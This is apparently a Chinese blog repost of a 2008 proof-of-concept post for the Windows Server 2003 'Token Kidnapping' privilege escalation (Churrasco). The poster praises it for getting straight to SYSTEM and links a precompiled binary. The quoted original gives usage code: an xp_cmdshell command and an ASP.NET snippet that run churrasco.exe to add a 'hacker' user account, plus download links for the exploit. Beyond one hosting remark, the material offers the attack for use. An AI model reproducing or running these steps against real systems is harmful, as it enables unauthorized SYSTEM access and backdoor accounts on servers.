MS Windows 2003 Token Kidnapping Local Exploit PoC

最新推荐文章于 2025-11-25 12:12:47 发布

原创最新推荐文章于 2025-11-25 12:12:47 发布 · 831 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#windows #token #asp #output #application #system

本文介绍了一种针对Windows 2003系统的提权漏洞利用方法，通过该方法可以在特定条件下以SYSTEM权限运行代码。文章提供了两种利用场景：一是通过SQL Server执行代码；二是通过IIS6运行ASP.NET或经典ASP应用实现提权。

提权很好用，直接system。文章末尾贴个TR那里的测试图。
编译好的： http://www.blogjava.net/Files/baicker/Churrasco.rar （via 009）

From：http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows
services accounts can impersonate. Other process (not services) that can impersonate are IIS 6 worker processes
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide
shared hosting services then I would recomend to not allow users to run this kind of code from ASP.

-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'

-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " /"net user /add hacker/" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...

You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

backup link: http://milw0rm.com/sploits/2008-Churrasco.zip

Enjoy.

Cesar.

# milw0rm.com [2008-10-08]

图在这里：